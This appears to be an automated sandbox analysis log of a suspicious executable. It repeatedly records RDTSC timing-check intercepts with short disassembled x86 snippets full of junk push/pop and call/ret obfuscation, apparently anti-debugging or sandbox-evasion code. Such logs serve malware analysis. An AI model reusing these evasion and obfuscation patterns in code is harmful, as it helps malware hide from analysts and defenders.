Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CEEA second address: F1CF00 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD4CB4B57Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CF00 second address: F1CF94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007FAD4CB7C003h 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FAD4CB7BFF8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b pushad 0x0000002c call 00007FAD4CB7BFFFh 0x00000031 mov ebx, 1472F808h 0x00000036 pop edx 0x00000037 mov ebx, 603E5D85h 0x0000003c popad 0x0000003d push 00000003h 0x0000003f js 00007FAD4CB7BFFCh 0x00000045 mov edx, dword ptr [ebp+122D2DA6h] 0x0000004b push 00000000h 0x0000004d pushad 0x0000004e jg 00007FAD4CB7BFFBh 0x00000054 sub edx, dword ptr [ebp+122D3957h] 0x0000005a popad 0x0000005b push 00000003h 0x0000005d mov dword ptr [ebp+122D2D21h], eax 0x00000063 push 8BC8EAE7h 0x00000068 push esi 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CF94 second address: F1CF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1D00B second address: F1D011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1D0D2 second address: F1D0D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F0F78B second address: F0F7AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FAD4CB7BFF8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jns 00007FAD4CB7BFF8h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F0F7AA second address: F0F7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3A9AD second address: F3A9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3AB2F second address: F3AB62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FAD4CB4B5A9h 0x0000000c jmp 00007FAD4CB4B587h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD4CB4B57Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3AB62 second address: F3AB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3ACE7 second address: F3AD0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB4B586h 0x00000008 jng 00007FAD4CB4B576h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3AD0E second address: F3AD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3AD14 second address: F3AD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FAD4CB4B57Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3AD25 second address: F3AD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3AEBD second address: F3AEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B57Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD4CB4B583h 0x00000011 jno 00007FAD4CB4B576h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3B317 second address: F3B325 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3B325 second address: F3B33B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD4CB4B576h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FAD4CB4B576h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3B33B second address: F3B35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7BFFEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD4CB7BFFCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3B789 second address: F3B78E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3B8F1 second address: F3B905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FAD4CB7BFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FAD4CB7BFFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3BB87 second address: F3BB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F33BE1 second address: F33BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FAD4CB7BFF6h 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F33BF1 second address: F33BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F0A6DA second address: F0A700 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAD4CB7C010h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F0A700 second address: F0A70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAD4CB4B576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3BD0C second address: F3BD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C312 second address: F3C331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B589h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C331 second address: F3C34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FAD4CB7BFFCh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C34A second address: F3C361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAD4CB4B576h 0x0000000a jnl 00007FAD4CB4B576h 0x00000010 jp 00007FAD4CB4B576h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C361 second address: F3C37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C008h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C37E second address: F3C384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C4CA second address: F3C4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C4CE second address: F3C4DD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C4DD second address: F3C4E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C63D second address: F3C654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jc 00007FAD4CB4B576h 0x0000000b jmp 00007FAD4CB4B57Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C654 second address: F3C67A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d jmp 00007FAD4CB7C009h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3C67A second address: F3C68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB4B581h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3CAEE second address: F3CAF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F3CAF4 second address: F3CAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F431F0 second address: F431F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F431F6 second address: F431FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F48202 second address: F48208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F485D9 second address: F485FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F48755 second address: F48759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F48759 second address: F48778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B586h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4AEEB second address: F4AEFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4B742 second address: F4B746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4BB69 second address: F4BB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4BB6D second address: F4BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4BC34 second address: F4BC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FAD4CB7BFF8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov esi, dword ptr [ebp+122D3A67h] 0x0000002b mov dword ptr [ebp+122D2A31h], eax 0x00000031 nop 0x00000032 pushad 0x00000033 jc 00007FAD4CB7BFF8h 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4BE98 second address: F4BE9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4BF5B second address: F4BF68 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4C172 second address: F4C177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4C6E2 second address: F4C6FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAD4CB7C002h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F4F76D second address: F4F772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F501A7 second address: F501B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F52BC9 second address: F52BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F54F8F second address: F54F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F54F93 second address: F55026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FAD4CB4B576h 0x0000000d jmp 00007FAD4CB4B581h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FAD4CB4B578h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f stc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FAD4CB4B578h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c jbe 00007FAD4CB4B580h 0x00000052 jmp 00007FAD4CB4B57Ah 0x00000057 mov dword ptr [ebp+122D2838h], ecx 0x0000005d push 00000000h 0x0000005f clc 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 jp 00007FAD4CB4B57Ch 0x00000069 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F55026 second address: F55046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAD4CB7BFFEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F55046 second address: F5504A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F55256 second address: F5525B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F563D0 second address: F563D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F571B5 second address: F571C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAD4CB7BFF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F571C0 second address: F571C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F57305 second address: F57316 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F590C2 second address: F590D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F57316 second address: F5739C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007FAD4CB7C004h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FAD4CB7BFF8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push edx 0x00000030 movzx edi, si 0x00000033 pop ebx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007FAD4CB7BFF8h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 xor dword ptr [ebp+122D2937h], ebx 0x0000005b mov eax, dword ptr [ebp+122D01E9h] 0x00000061 cmc 0x00000062 push FFFFFFFFh 0x00000064 mov ebx, dword ptr [ebp+122D38FFh] 0x0000006a nop 0x0000006b push ecx 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F590D0 second address: F590D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F5739C second address: F573A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F590D4 second address: F590DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F573A2 second address: F573AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F590DA second address: F59146 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAD4CB4B57Ch 0x00000008 jnl 00007FAD4CB4B576h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FAD4CB4B578h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub dword ptr [ebp+12460019h], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D1F0Fh], ecx 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push esi 0x0000003e jmp 00007FAD4CB4B57Bh 0x00000043 pop esi 0x00000044 pop eax 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FAD4CB4B585h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F573AE second address: F573B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F59146 second address: F5914C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F5914C second address: F59150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F5A051 second address: F5A0B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAD4CB4B578h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 adc di, 10E6h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FAD4CB4B578h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a push eax 0x0000004b jc 00007FAD4CB4B588h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F5938B second address: F59394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5A0B2 second address: F5A0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
